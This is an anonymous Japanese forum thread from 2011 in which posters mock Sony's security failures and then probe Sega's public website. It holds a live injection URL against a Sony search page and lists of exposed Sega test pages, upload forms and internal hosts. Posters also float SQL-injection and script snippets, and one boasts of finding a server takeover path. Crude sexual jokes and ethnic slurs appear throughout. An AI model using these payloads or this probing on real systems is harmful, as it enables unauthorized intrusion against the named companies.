　 　 　　　　　　::::::;;;::::::::;;;;　　　　　　 　`ー､＿ﾉ 　 　 　　　　 �煤@l､Ｅ ﾉ　(　 ﾊﾞﾝ! ﾊﾞﾝ!
　　　　　　　　　　　:::::: :::::::　　　　　　　 　　　::::::;;　:::::::　::::: :::::;; 　 ⌒
　　　　　　　　　　　　　:::::::::　　　　　　　 　　:::::;;; ::::::::::::::: :::;
　　　　　　　　　　　　　 　::;;::.／￣￣￣＼ :::;;;;::::::::;;;;;;;:::''
　　　　　　　　　　　　　　　／　─　 　 ─ ＼ 　ﾊｧﾊｧ…
　　　　　　　　　　　　　 ／　 <○> 　<○>　 ＼
　　　　　　　　　　　　　 |　　　　（__人__）　　　　|
　　　　　　　　　　　　　 ＼ 　　　 ｀⌒J´　　　／
　　　　　　　　　　　　　 ／ 　 　 　　　　 　 　 ＼

>>375
ｗｗｗ

>>390
やめろよこえーなw

お前らスーパーハカーだったのか…

サイバー・キジャッカー

クソワロタ
これを機に妊娠とゴキちゃんは仲良くしろよ

>>391
あるあるw

お前らまさにアノニマスだなｺﾜｲｺﾜｲ

http://www.sonyproductinformatie.nl/main/search.php?searchfield=%3Cimg%20src=http%3A%2F%2Fblog-imgs-34-origin.fc2.com%2Fn%2Fe%2Fw%2Fnews020%2F0420101115.jpg%20width=349px%20height=800px%3E

sonyのサイトのなんかより金もらえるgoogleのxss探せよ

最近、ソニーのGKの活躍が無いのに比例して、ハッキングに対しても脆弱になっちゃったのかな？

　　　　　　　　　　　　　　　　＜な、言ったとおりだろ
　　　　　. 　　.|＼ ／￣￣＼／|　
　　　　　　　　 |／　　ノ'.ヾ　 ＼|　　　　⊂ニニ⊃.
　　　　　　 　　 {.≪�@>　<�@≫| 　　　 　＿＿＿_
　 　　　　　　 　ｌ.　　（__人__）.　| 　　　／　　 　 　 ＼
　　　　　　　　　ｌ　　　ヾﾆァ'　｜ 　／（○）　（○）　 ＼ 　　＜言葉もねぇや・・・　
　　　　　　　　.　{　　　　　 　 ｜／ 　 （__人__）　　　　 ＼　　　　　
　　　　　　　　 　{　　　　　　 / |　　　　ヾﾆァ'　 　　　　　| 　　
　　　　　,-､　　　ヽ　　　　 ノ、 ＼　　　　 　　　　　　／　　
　　　　/ ノ／￣／ ` ー ─ '/＞＜　　　　　　　 ┌､ ヽ　　ヽ,　　
　　　/　 L_　 　 　 　 ￣　　／　　　 　　　 　　　_l__(　{　r-､ .ﾄ
　　　　　　_,,二)　　　　　／　　　　　　　　　　 　〔― ‐} Lｌ　 | l) ）　
　　　　　　>_,ﾌ　　　 　 /　　　　　　　　　 　　 　 }二 ｺ＼ 　 Li‐'
　　　＿_,,,i‐ノ　　　　　l　　　　　　　　　　　　　 └―ｲ 　 ヽ　|
　　　:::: :::::::::: :::::::　::::: ::::::::::::;; :: :::::;;;;;::::: :::::; :::::;;;;;:::::::::;;;;;::::
　　　　　　:::::;;;;;:::　;;::;;::　　　　　　:::::::　::::: ::::::::::::;;;;;;::::: :::
　　　　　　　　:::::::::　　 ＿＿＿　　　:::::;;; ::::::: :::;
　　　　　　　　 　::;;::.／⌒ 三⌒＼:::;;;;''
　　　　　　　　　　／<○>三 <○>＼　　
　　　　　　　　 ／:::::　 （__人__） 　::::: ＼
　　　　　　　　 |　　　　　`⌒'J　　　　　|
　　　　　　　　 ＼　　　 　 　 　 　 　 ／
　　　　　　　　 ／ 　 　 　　　　 　 　 ＼

>>402
どうゆうことだよww

>>402
まじか…

週刊流出

原発問題で原稿落ちた白竜の次のネタが、ローン会社の顧客情報流出問題なんだがｗｗ
もうスレたってるのかな？

>>402
ｋｗｓｋ

実際ソニーだけじゃないだろ
そっちのが怖い

>>402
吹いたｗ

XSSとかSQLインジェクションとか情報処理試験の教科書に載ってるレベルwwwww

まぁ真面目な話をすると、昔作ったホームページとかって企業にとっては盲点なのかもな。
当時は知られていなかった脆弱性とかが残ってる可能性がある。
昔の資産はリスク分析の対象から外しているところもあるのかも。

>>408
ｿﾆｰは個人情報をまんま一般公開ｗとかしてるし
脆弱性うんぬん以前の問題

何これ？
http://sega.jp/test/get.html

>>412
こわいなｗ

>>408
世界中の企業がセキュリティ対策＝プログラム改修工事で中小IT企業が特需になるよ！
ソニーのおかげで落ち込んだ日本経済を救う火種となる！

>>412
いったい何がダウンロードされるんだ……

こんな荒探ししだしたら、海外の有名会社のサイトにも
いくらでもあるぞｗｗ

>>412
SQLインジェクション上等の悪寒

>>411
そこまで間抜けな事やったのか・・・
ソニー以外でそんな間抜けな事やらかした企業ってあるんだろうか・・・

>>412

　　ありがとうございました。正常に送信しました。

>>412
saiyo
ってなんだよ

>>412
以前作った@china.comのアドレスで落としてみようと思ったけど、
china.comのメールサービスがログインできなくなってて諦め

<form method="POST" action="/cgi-bin/saiyo/download.cgi">

採用！！

>>418
パーツショップとか色々

>>418
出てないだけで一杯あると思うぞ。
昔作ったサイトがそのまま残ってる会社とか結構あるじゃん。
それこそ検索エンジンが広まる前からやってるところとかな…

あーなるほどわかったわ
Googleの採用試験と同じで
これに気付いた優秀なエンジニアを採用しようっていう魂胆ね
把握

>>419
わろた　何が送信されたんだよｗ

ほんとここ最近のソニーさんは大人気だな
神懸かり的な注目の浴び方

>>414
本当にそうかも
セキュリティ関連の勉強しとくか

>>417
だよな。
エスケープしてなさそう。

ソニーって中小企業だな

>>412
ドロップダウンリスト
http://sakuraweb.homeip.net/uploader/src/up146612.png

>>431
名前が出てくるだけ？
そもそもカイポという謎のキャラはなんなんだ？

>>431
それお前のブラウザが勝手に吐いてるリストだから

アップロードのテストフォームねぇかな。
それさえあればファイル上げてphp実行できれば大勝利だ。

なにか送信されてきた（´・ω・｀）

>>434
有りそうだな

件名：採用情報−障がい者


HOST = *****
AGENT = *****
[ NAME ]:アーケオス
[ E-Mail ]:******
[ FILE ]:$B?=$79~$_(B
$B;XDj$N%U%!%$%k$rE:IU$7$F$$$^$9!#(B
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
SEGA Corporation
HomePage:http://sega.jp/
E-Mail:[email protected]
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

Attachment: saiyo_handicapped.db
Encoding: UUEncoded
begin 600 saiyo_handicapped.db


こんなのが届いたぞｗ

>>437
顔面障害者を見破るとは、
セガの技術者もなかなかやりおるな

今度はセガか

>>423
>>424
ありがとう
結構あるものなのか〜
今まで客の個人情報とかを一番気をつけて管理してるもんだと思ってた

そう考えるとお金とか絡まなくても個人情報を入力するだけでも怖いな・・・

bgp.he.netは今サービス停止してて使えんけど、Googleキャッシュから
http://webcache.googleusercontent.com/search?q=cache:bgp.he.net/net/157.109.0.0/16
DNSクリックすると関連鯖が分かる

それにしても次から次へとネタがあるな…
もう信用も地に落ちたな

E-Mail:[email protected]

なんか笑えるメアドだな

ここがハッカーの交流掲示板だ！！

>>443
どこの企業サイトもそんなもんだぞ
info@、otoiawase@、webmaster@などサイトに載ってるメアドはそんなのが多い

SecureTicket 4.0?
http://workmanager.sega.co.jp/
ファイル転送系?
http://aspera01.sega.co.jp
SECUREMATRIX?
http://altair.sega.co.jp/

http://sega.jp/opinion/test.html

技術者のメールアドレスかな？
まぁ関係者がわかったな。

なんかわからんけど漏れすぎですやん

つーか、SEGAマジやばいだろこれ

顧客dbが漏れてないだけマシ

880 名前：番組の途中ですが名無しです[] 投稿日：2006/06/07(水) 23:45:37 ID:RnF+q3dVO~
ウィンドウズ、ワード、エクセル、IE
こんなのはツギハギだらけで奇形化した過去の遺物。
PS3が出たら過去の遺物になるよ。

SCEがCell向けにプログラムを最適化して、
さらに3D-GUI(XMBの進化系)を前提にしてフルスクラッチで作成したプログラムを使えば、
過去の遺物と糞遅いレガシーデバイスを前提とした
糞プログラムでは、考えられないほどの
快適性と効率が得られるようになるよ。

お前らもなんだかんだ言って、今使ってるパソコンを捨てて
PS3で仕事やネットするようになるだろうね。

まあ見てなって。

いま、任天堂を必死に掘ってる人がいそう

これは何するもんだろ？
http://sega.jp/test/sample.html
http://sega.jp/test/sample2.html

>>446のいくつかは古いWebアプリケーションで色々アレだなぁ
国産のだと脆弱性を発見する人も居ないから更にアレ

いいおもちゃ見つけたなおまえらｗ

segaとばっちりでカワイソス

http://www.dell.com/downloads/jp/solutions/insight/Insight_10_44_45.indd.pdf
http://nagamochi.info/src/up66922.jpg

スクエニサイトとか穴だらけのイメージ

あ、スマンpdf注意！
庄司のタマとったでーーーーー！！！！

>>455
ここの住人は
おもちゃをすぐ壊しちゃうから気を付けないといけないなｗ

あーたまには敗北の味が知りたいわー

危険なanonymousの隠れ家はココデスカ？

セガはソニーとか東電がやらかしまくってる今だからまだよかったんでないか
何もネタが無い時に見付けられたらそれこそ祭り上げられるぞ

>>457
この人が管理責任者か
この人はクビになるのかな。

基本的にテストページしかないからマシな方なのかな

>>465
いや、テストページがあるのはかなり危険なんだよ。
例えばファイルアップロードのテストページがあったとする。
セキュリティとかなんもしてない状態のだ。
そんなもんあったらこっちからウィルスアップロードすれば一発で終わる。
だからアップロードってのは実は怖いもんなんだよ。
偽装jpgとかあるだろ？開いたら別の画像だったっての。
exeファイルをjpgで偽装されたらjpg踏んだ瞬間アウトってのもあるんだぞ。

セガはケチって開発機とか用意してないのか
本番機にテストページがあるなんてシンジラレナーイ

なんでセガ苛めてるんだよｗ

セガ休みなんかなやっぱ。
対策されなくて張り合いがない。

ここはスーパーハカーだらけのインターネットですね
技術的には興味があるが、捕まりたくないからURLすら踏めないぜ
失うものが無いやつはいいよな…

創価が息を吹き返した途端にこれか

>>466
�d

Expansion Element Introduction -
http://sega.jp/pc/baldurs/nwnsou04.html

>>470
法律知ってりゃ安全だし、不安ならプロキシを使えば良い。
本当にヤバいのを見つけたらIPAに通報すりゃ良心も満たせる。

>>472
これ思い出すw
http://ja.uncyclopedia.info/wiki/%E3%81%82%E3%81%82%E3%81%82%E3%81%82%E3%81%82%E3%81%82%E3%81%82%E3%81%82%E3%81%82!

ソニーのことだからきっとタイマーセットしてるんだよね

サーバを構築側の視点から言うと
こういうの全部塞ぐのはすげーーー大変だよ

セガ？
セガも顧客情報漏らしたの？

>>476
その大変な事を続けて
ごはんを食べてるんじゃないの？

>>477
顧客情報漏えいはソニーの専売特許や！！

>>476
同じ立場の人間だけど大変だからと言ってやらないのは間違いだし管理者として一番許されない行為。
危機意識が足りないんだよこの管理者は。
ってなわけでニートの俺雇ってくださいセガさん。

>>476
セガの件もソニーの件も、
並のwebの技術者なら息をするレベルで対策しているだろ

そろそろ、すきやみたいに（3回目）とかで通じるんじゃねぇのか

倒産への
終わりの始まり

http://sega.jp/pc/sonicdx/support/sonic_base.html

普通はテストページを公開された場所には配置しない

>>484
うわああああああああああ

ゲーム業界とか昔から動けば良いや的プログラムばっかりだからしょうがない

セガはいい加減な人間ばかり雇ってるイメージ

>>476
古いサーバー放置とか古いスクリプト放置とかWebアプリケーション未更新とかは擁護できんなぁ。
WAF未導入も。

『クロムハウンズ』プレミアムトライアルレポート | イベントレポート
http://sega.jp/soft/report/2005/0802/home.shtml

>>481
ある程度の規模の開発となれば10人以上のプログラマーを使うわけで
その全員が並のレベルに達してるわけじゃない
まあ漏れがないようコードレビューや試験で潰すけどさ

>>481
現在の常識からいくとその通りだけど、作った当時はそうでもないかもしれない。
ここがミソだな。

>>19
同意
またセガの体を張ったギャグが見たい

>>492
んなこといったらPSNの件も
構想は10年以上前からだから仕方ないって話になるだろｗ

また妊娠の仕業か
いい加減にしろ

http://sega.jp/kt/test/i_present.html

テストページ大杉

正直もう穴だらけでサーバ乗っ取ることは可能なレベルだ。
sqlコマンド通してしまえばもう乗っ取れるとこまできてる。
が、それやったらアウトだからURL叩いたら個人情報閲覧できるようなページ探し中。

なんで任天堂ロゴなんだよセンスねえなあ。これだろ
http://uproda.2ch-library.com/37231174j/lib372311.png

>>494
作った「当時は」仕方がなかったんだろ。
問題は、昔作った穴を現在まで放置していることだ。
とっくに捨てるか改修しているべきものが残っている。

おまえらの大好きなサムスンとか、ＬＧの古いサイトにも
脆弱性があるんじゃないか？

>>493
セガ「この事件でソニーには消えてもらおう、そして私が再び表舞台に・・・っ！」

>>492
最近だとHTTP Parameter Pollution (HPP)が出てきて有名企業も軒並み問題が発覚したからな
http://www.slideshare.net/Wisec/http-parameter-pollution-a-new-category-of-web-attacks
http://www.iseclab.org/people/embyte/slides/BHEU2011/hpp-bhEU2011.pdf

>>410
Webのシステム自体に脆弱性ありすぎて、分けわかんなくなってきたわ。

どんだけ「aaaあああ」好きなんだよ

きじゃくせいはもっとあるはず

ソニーのはゲーム部門関係ないよな
オンライン事業どころかIT関連総倒れじゃね

2chで短縮なんて怖くて踏む気にならない

ソニーはシステム開発なんて自分のとこで全くやってないでしょ
たぶん大手ベンダーに出してると思うよ

http://www.google.com/search?q=テストページ　あああああああああああああああああああああああ
みんなああああ大好きなんだな

関係ないけど、大戦略のシナリオの登録か何かだろうか？


http://sega.jp/pc/soft/advd2001/dc/add-dc/upload_form.html

>>509
適当な文字を片手で入力してCtrl+zしてマウスでページ確認という流れが一番作りやすいんだよ。

>>510
シナリオファイルの登録にはADVANCED大戦略2001付属のドリームパスポート3が必要となります。

だって

エスケープ漏れか　
ちゃんとしないとね　だめだよ

>>272
最高にうけたｗｗｗｗｗｗｗｗｗｗｗｗ

セガと言えば現セガの新宿ジャッキーがキンタマ引っかかったりもしたな

期限切れのwebサイト、ファイルを自動で消去か非公開にする管理ツールとか無いのかな。
で、再公開する場合は最新の脆弱性と照らし合わせてチェックして、社内で承認する必要があるとか、そういうプロセスを回せればこういう事例も減るだろうに。

http://sega.jp/test/test.html
左下のtestをクリック

チョニー完全におもちゃになってんなｗ
ゴキブリこんなネタ企業崇拝してんだから笑えるｗ

>>517
セガワールドの隣の住所だね…
ttp://www.jikobukken.com/miyazaki_ken/nobeoka_shi/hirahara_cho_5_1492_8.shtml

事故物件の住所・所在地 宮崎県延岡市平原町5丁目1492-8
発生年月日 2008年5月26日
不動産の種類 インターネットカフェ
ワケあり物件情報 自殺
重要事項説明書 男性(22)が硫化水素自殺
不動産情報・部屋番号 インターネットカフェ「ホワイト」シャワー室内

>>519
正確にはセガワールドヒダカプラザと同番地だった
ttp://location.sega.jp/loc_web/hidakaplaza_sw.html

>>471
顕正会乙

>>476
ネットワーク管理者ひとりでは大変
開発の誰かが始末し忘れたソースなんかどうすりゃいいんだって感じだ

しってた

チョンニーハッキングされて超涙目ｗｗｗｗｗｗｗｗｗｗｗｗｗ
日頃の行いが悪いからなｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

セキュリティ会社勤務の俺の仕事が増えんだよカス。
あんまさわぐんじゃねーー

これ、アメリカの社員がおかしいんだな
無能なのか、内部から足引っ張ってんのか。どっちかだと思う

もう日本に管理機能を移せよ

>>512
ドリパスｗｗｗ懐かしなおい

こういうことがあるから、セキュリティ会社に高い金払う意味があるんだな、って思われるんだろ？

>>509
「秘密の部屋へようこそ」で検索していた頃が懐かしいｗ

貴社Webサイトの脆弱性診断はおまかせくださいｗ
セキュリティ会社いまどこも不景気なのよ〜

たしかに>>525はおかしいなｗ

しかしソニーの日本人幹部は、アメリカの担当社員をどう思ってるんかね
マジで無能か、あるいは離反者だぞこれ

全て、アメリカ法人だ。　

サーバー移転の際に、元サーバの2,400人の懸賞情報を消し忘れとかいう、

超単純なミスも、アメリカ法人・・・

日本はゆとりとか言われるが、こんな馬鹿なミスはしない

アメリカのレベルの低さが半端ないな・・・

セキュリティ専門の社員でなくても、こんなミスはしないだろ・・・

本気で社員に、他社から買収されてる人間がいると疑うわ

あ〜あ〜

http://slashdot.jp/~NurseAngel/journal/530667

>>532
俺は悪くねぇからな。
俺検索システムで出てきたページを貼ってるだけなんだからな。

さっきからmsearch使ってるサイトで色々やってみたんだがセガだけだぞこんなの出てきたの。

因みに、全件検索はu:/

セガェ・・・

露出狂みたいだな

>>1
TLDが怖いんだが・・・これ本当にソニーのサイトだよな？

ID:7a9QAULp0なにこのゆとり臭

短縮URLで釣ろうなんてニワカでゆとりで甘え

わかったか>>1

>>533
あーあ
やっちゃったね

またgoogleさんが掘り出したのか

俺はいつも言っている
アンチウィルスソフトにこだわるよりはJavaScriptを切れと。
NoScript最強伝説

セガの中の人、まだ削除要請に降臨してないのかｗ

スーパーハカーってマジで存在するんだな

>>542
つまんねぇんだよなぁ。
もう詰んじゃったからなセガ。
あとはスクリプト実行すればいいだけなんだけどやったら逮捕だしなぁ。

>>543
こんなのハッキングじゃねぇよ。
玄関の鍵閉まってた思いきや、窓が空いてましたってレベル。
ハッカーってのは複製不能の鍵を作るとこまでいって初めて名乗れるようなもんだ。

>>272
削除をクリックするだけで逮捕されるのかな？

>>545
濡れました。抱いてください。

>>536
URLに元から任天堂のロゴ混ぜてる

もしかしてTVのCMやってんのえーちゃん？

ぜ…脆弱性

>>545
でもそういう奴は本当にいるもんな
海外には

玄関の扉が空いていて、
奥さんがM字開脚でオナニーしてても
挿入しちゃったら犯罪だっていってんだろ

ソニーはどうでもいいけど
セガ大丈夫なんか

>>545
まじで、一般人にすらやぶれる扉すらある体たらくで
本物のスーパーハカー相手にまで徹底抗戦(苦笑)だぜ。
顧客データもって無謀なことはやめてほしいね。

明日か明後日の新聞やニュースでソニーとセガが揃い踏みかな

またかｗ

だからもうサイト使うのは諦めろって

ソニーネット舐めすぎワロタ

セガは個人情報漏らしてないからまだセフセフ

>>551
今回は本当に偶然の発見。
間違ってGETの部分消してしまったらヘルプ画面出てきたところから始まった。
これが俺みたいなプログラマのヒゲ程度にチェックメイトされるんじゃこの技術者は後がないね。

セガは被害者は出てないからこのまま書き換えがなければニュースにはならないのでは？

>>559
漏らしたようなもんだぞ。
今俺はその鍵は持ってる。
そしてその鍵の生成は簡単にできる状態。
俺はやらないからセガはさっさと鍵を変えろ。

>>560
このクラスのサイトのセキュリティ対策費って今いくら位？
それをケチったかボラれたんだろうなぁ

>>563
金取るの恥ずかしいわこんなのw
どうしてもってんなら30円で受けるよ俺は。

ありがちなセキュリティホール総チェックしてもらって100万ちょっとってとこだったと思う

建設みたいに6次請けまである業界だろうから末端にいけばいくほどいい加減になってんだろそんなの

セガに矛先変わってて糞ﾜﾛﾀ

相変わらずニュー速はハッカーのすくつだな

モバイル向けサイトの裏舞台ってこうなってんだな
しかしちとセガは可哀想だから教えてやった方がいいんけね

情弱性

>>563
つまり>>457の人の価値は俺にとっちゃ30円ってとこなんだよ。
当時マネージャだったかどうかは知らんが開発に関わった上でこんなもん仕上げるなんてゴミだね。
俺がマネージャならすぐプロジェクトから外して学校通わせるレベル。

また2chから逮捕者か

ID:ohF9QSU9Pがやるとこまでやって逮捕されたら
身体を張ってニュースを提供するニュー速民の鑑

>>573
おい言うなよ、ガラ空きだったからちょっと調子に乗って色々やってみたらチェックメイトの位置まできちゃったんだよ。
ここから先は踏み込まないからさっさとセキュリティでもなんでもかけろセガ。

個人情報を漏らしたようなものだ、というなら捕まるだろうね
その状態にしたのはID:ohF9QSU9Pなんだから
カギをかけてないほうが悪いなんて言い訳は通用しない

ちなみにサーバに対して攻撃は一切していない。
サーバの内容も一切書き換えてない。
ただこのプログラムならこれを実行すれば完全に乗っ取れるってのが俺はわかっただけ。

TV用

しっかしなんでテストページなんて一般にアクセスできるようになってんの
SEGA好きだからもっとしっかりしないと悲しいぜ

>>575
いいや、俺は検索画面で検索してたら偶然テストプログラムが出てきただけだ。
散歩してたら窓が空いてたのを発見しただけだよ。

どんだけSONY嫌われてんだよww

>>578
それをセガに通報して終われば良かったのにね
選択を間違ったばかりに…まあがんばれ

いっそのことクロスサイトスクリプティングっていうゲームだせばいい

BRINKまでにPSN再開は無理そうだ
海外PC版か箱か迷うな
もう糞箱とかまじで言えなくなったな

だからね、こんな糞プログラマだかマネージャだか知らんがゴミ使うぐらいならニートの俺雇ってくださいよ。
同じ時間でこいつの20倍は作業させていただきますよ。

SEGA用

適任者が俺しかいないからWEBエンジニア応募者の面接したりするけど、
この業界に来る使えるレベルの人って大体、趣味で学んだ様な人で、どこかぶっとんだ人が多い
>>578みたいな
普通は新卒で入って仕事で覚えるものなぁ

こんなんで逮捕されてニュースになったら、セガの顔に泥を塗るだけだと思う

ファミ通「PSPのダウンロード専用ソフトが好調」
http://kamome.2ch.net/test/read.cgi/ghard/1304752816/l50

助けてくれチカニシの攻撃に押されている

>>584
おい、俺を雇え！

>>583
ちゃっかりしてるなw

>>585
セガが恥をかく程度なら大した話じゃないだろ
とっとと捕まえるべき

>>587
もうちょい人が少ない頃だったら雇えたｗ
今は危なっかしくて無理ｗ

早くつなげろよ
お客にアナウンスも出来ないならこのまま撤退しろカスソニー

>>589
俺はセガが用意した検索フォームで検索しただけである。
何の罪になるのかね。
セガが自ら窓開けてますって教えてくれたんだぞ。

メルカトルは健在だったか

>>592
検索しただけじゃなくて悪意をもって公開しただろ

ID:ohF9QSU9P
こいつが噂のアノニマスか

俺の中では
憂>唯>橘さん>律>沢庵>澪
あずさとかマジキチレベル
見ててなんかイライラする
嫌いじゃないけどお前らと一緒で生理的に無理

で、実際
UPディレクトリでphp実行でけたりすんの？

>>592
ソニーさん
こいつです

言い訳しても不正アクセス禁止法で御用だろ

真面目に揉めてるんなら結論出すけど、不正アクセス防止法で禁止されてるのは
「アクセス制御機能を有する特定電子計算機」への不正な手続きでのアクセスだから、
そもそもアクセス制御の掛かってない情報へのアクセスに関しては、善意悪意を問わず
罪にならないよ。

http://www.ipa.go.jp/security/ciadr/law199908.html

一　当該アクセス管理者によってその内容をみだりに第三者に知らせてはならないものとされている符号


はい、アウト

三澤だな

576 名前：名無しさん＠涙目です。(埼玉県)[] 投稿日：2011/05/08(日) 04:04:21.39 ID:ohF9QSU9P [17/21]
ちなみにサーバに対して攻撃は一切していない。
サーバの内容も一切書き換えてない。
ただこのプログラムならこれを実行すれば完全に乗っ取れるってのが俺はわかっただけ。

phpinfoしてみたい…
ちょっと見るだけ、挿れないから、絶対、ね(;´Д｀)

>>1割れ王子 ★
　　http://be.2ch.net/test/p.php?i=3646509697

　　↑こいつが立てたスレ↓

　　【速報】ソニーのサイトにヤバい脆弱性
　　http://hatsukari.2ch.net/test/read.cgi/news/1304763693/
　　今日は一日グロ画像三昧
　　http://hatsukari.2ch.net/test/read.cgi/news/1304315622/
　　東北大学の文学部の無能率は異常　死ね金食い虫
　　http://hatsukari.2ch.net/test/read.cgi/news/1304340755/
　　環境副大臣が韓国に謝罪　マジで日本死ねよ・・・俺の祖国韓国に迷惑かけるんじゃねえよ・・・
　　http://hatsukari.2ch.net/test/read.cgi/news/1304146285/
　　なんで「完全自殺マニュアル」はあるのに「完全殺人マニュアル」は無いの？　あれば人殺すのに
　　http://hatsukari.2ch.net/test/read.cgi/news/1303475355/


.

>>595
ちがうよ
こいつが訴えられた後に騒ぐのがアノニマス
つまり俺らだな。

>>603
だめだおw

>>594
なんかこれってGoogleストリートビューの件に似てるね。
下着干してたらそれを撮影されてGoogle訴えるみたいなやつ。
その下着見えるURL貼ったら逮捕って言ってるようなもんじゃねぇのこれって。

(´Д｀)あ…あれ…
いやなんでもないお…

twitter以外で短縮url使ってる奴はアホ
または悪意がある奴

誰かvipに貼れ

>>601
え、どこそれ？
俺そんな規約なんて読んでないなぁ。
検索フォームにあった？

>>402
今こんな気持

完全に出遅れたがこれってν即から逮捕者出る可能性あるのかな

>>600
おお、ナイス助け舟。
俺この辺全く強くないんだよ。
個人情報保護法とか守る側はわかるけど攻める側の法律は知らんのよ。

>>611
規約じゃなくて法律だよ

[ニュース速報]【速報】ソニーのサイトにヤバい脆弱性
http://hatsukari.2ch.net/test/read.cgi/news/1304763693
セガのサイトが絶賛ハッキング中

>>616
ここがVIPか

>>601に書き出されている、法律らしい分かりにくい条文が意味する所は、
一般に通じている言葉に言い換えると、ID やパスワードの話。

>>615
ああ、本当だ。
けど俺は管理者じゃないよ。

getで送ったデータを内部で想定外の処理してるみたいだけど
これ利用してSQLとか出せたりするの？
できたらオワッタな

　　　　　＿
　　-｢￣　 |
　 | ｜　　 |　　　　ﾎｲﾐ
　｜｜　＋|
　 .L ‐--‐'ヽ
　｜l　ﾘV _`　　
　 |cl | ´ヮ ﾉ／
　 .l ﾚ l　|
　　/　| +|

>>601
それに俺内容は教えてないしな。
空想だよ、こうやればこうなってこうなるんじゃないかなーって空想。
実行だってしてないから本当にできるかどうかわかんないしねー。

絶対にVIPなんかに立てるんじゃねぇぞ。あいつら何するかわかんねぇんだから。ゆとりは怖い物を知らない

絶対にVIPには教えるなよ
いいか、絶対だぞ

無茶しやがって…

これでハッキング扱いとか鼻で笑われるどころか苦笑いされるわけだが・・・
ガキが沸いてきただけだろ

>>624
あいつらあデカい罪やってくれたら俺のこと忘れてくれるんじゃねぇかなとか思ったり。
ここで俺がVIPに貼ったらまた別の罪になりそうだけどなw

>>626
XSS実行できるなんて充分攻撃
どの程度コード実行できるか、試してないからわからないけど

>>620
出来るけどDB仕様知ってないと難しいと思う
よっぽど単純なtable名とかなら別だけど

>>627
いや情報元だからｗ

>>626
だよなー。
こんなのハッキングじゃなくて玄関ノックした程度だよなー。
おい、>>626様が言ってらっしゃるぞ！
お前らいいか？これはハッキングではない。繰り返す、これはハッキングではない。

>>627
VIPうんぬん以前にお前は何も罪になる様な事はやってないからね

[ニュース速報]【速報】ソニーのサイトにヤバい脆弱性
http://hatsukari.2ch.net/test/read.cgi/news/1304763693
セガのサイトが絶賛ハッキング中

>>633
なんで誤爆したの？

そこそこセキュリティの知識あるのに派遣や底辺SEやニートやってるヤツはこれを機にいい職が貰えそうだな

だからって沢山のサイトハッキングして警鐘鳴らすとか絶対にしちゃだめだぞ

>>629
そりゃそうか、ER図漏れてたらアホすぎるしな

でも、そこまでできるならどうとでもできそうな気がするな
どうなってるか知らないけど、何かすれば内部で処理してるSQL文もブラウザ側に送り出したりできそうな気がする

ニートは捕まってもニートなんだからいちいちびびるなよ

セキュリティ関連は、実績が無いとアピールしにくいｗ
某社のセキュリティホール見付けましたって言うと、
大抵の面接官はどん引きするｗ

>>637
おい逮捕されたらまたニートか、って言われるんだろ。
嫌なんだよそんなの！

XSSなんてせいぜいクライアントPCに表示させるだけだろ
２ちゃんねるなんて昔からXSSだらけじゃないかｗ

XSSを舐めすぎ
ガキはとっとと寝ろ

>>640
クライアント側で表示する際の不具合なら問題ないけど
今回の場合内部処理に問題があるからOSコマンドインジェクションとかSQLインジェクションもできるかも？

>>636
パラメータ渡せばデバッグONにしてSQLだらだら吐き出すような
アクションなんかもあったりするかもねｗ

誰か串さしてＶＩＰに貼るなんておろかな真似しないように

要はセガの管理者が第三者に公開したくない情報を
ID:ohF9QSU9Pが公開した

裁判になったら刑事でも民事でもアウト

>>644
なにこのチキンレース

>>642
XSS単体でも問題あるって
権限そのまま使えるんだから

>>642
あんな枯れきったサイトを改ざんして何になるのか疑問だがな

>>641
XSS、XSSって連呼してるけど君ら本当に理解してるんかね？
今回のはエスケープはしてたけどサーバに変なもん上げてた糞開発が問題なんだよ。
でもってこの糞開発はXSS理解してるつもり、悪魔でつもり。
俺でも本気になったらデカい会社相手でも数打ちゃ当たるってのがわかったよ。
今度から面接する前に、「御社のシステムはここを突かれたらハッキングされますよ、雇ってください」って言うか。

こういう人が多いから日本の技術はアホのままなんだよね
ソニーもこんな対応で結果がアレだし

>645 名前：名無しさん＠涙目です。(山口県)[] 投稿日：2011/05/08(日) 04:55:52.61 ID:UdtvOoDw0
>要はセガの管理者が第三者に公開したくない情報を
>ID:ohF9QSU9Pが公開した
>
>裁判になったら刑事でも民事でもアウト

>>645
パスワード入力無しで閲覧出来る時点で「公開」だろ
公開したのはセガ本人だよ

>>649
おまえみたいな人材を雇う会社があるとも思えんがｗ
仕事中に２ちゃんねるをヲチしながら残業時間中に
ボスの目を盗んで情報漏えいやらかしそうだもんな。

よし、やったれお前ら！
俺は風呂でも入ってくるわ！

>>649
テストページが残ってることなんて結構あるぞ
メンテしてるとソース上にデバッグ用ソースが残ったままとかザラだし
忙しくて消すの忘れるんだろうな

>>649
お前こそ中身を語れｗ

>>652
えへへ。

何だやっぱり豚の仕業だったか
全員捕まえて死刑にしろ

http://www.dotup.org/uploda/www.dotup.org1614186.jpg
http://www.dotup.org/uploda/www.dotup.org1614192.jpg

>>649
セキュリティ的な問題があってまさに中国人に攻撃＆脅迫されていますなう
な状況じゃない限り、そんなあぶねーやつ雇わないで、
セキュリティ会社に金積んでチェックお願いするわｗ

>>636
SQL Injectionは工夫次第でDB駄々漏れだぞ
テーブルは向こうに指定してもらえるように書けばいい

マジかよ糞箱に仕掛けてくる

昔は2chって杜撰なセキュリティ対策してたけど最近どうなってんだろ

</HTML>
<SCRIPT>alert('aho')</SCRIPT>
？

もうvipに飛び火させるしか全員生存のトゥルーエンドは見られないのではないか

ID:ohF9QSU9P
普通に企業に教えればお金もらえんじゃねーの？

はやくしろ

DBのテーブル名ってSQLで全部取得できなかったっけ？
普段そんな必要がないからやったことないけど
そんでselect *しちゃえばデータ全部取れちゃうんじゃね

笑えてきたｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

もはやセガがどうなるかより
ID:ohF9QSU9Pがどうなるかが興味の対象になってるｗ

あれ？ソニー？なにそれｗ

>>666
そんなのやろうと思わないからやったことなかったけど普通にできるな

SELECT * FROM USER_TABLES

で一発らしい

>>651
過失で匿名でもアクセス出来るように不本意に公開したのはセガでも
それらへのアクセス手段を公表した人間は罰せられるよ
残念ながら

Sonyが持ってるWebサイトでこんな初歩的な入力のエスケープすらしてないって・・・

>>666
普通はアクセス制限がある。普通は。

今年度に入って初の逮捕者かな
やっちまったなぁ

はやくしろ

>>670
微妙なとこだよそりゃ
